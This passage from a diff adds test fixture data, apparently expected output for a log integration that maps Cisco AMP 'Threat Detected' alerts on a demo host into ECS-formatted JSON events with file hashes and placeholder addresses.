Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251512150196256\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.DFC.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196256",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581713543Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196255",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581715796Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":365000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196254\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196254",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581730632Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":350000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196253\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196253",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581733039Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196252",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581734917Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196251",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581736759Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196250",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581738562Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":303000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251512150196000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251512150196249",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:38.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581740367Z",
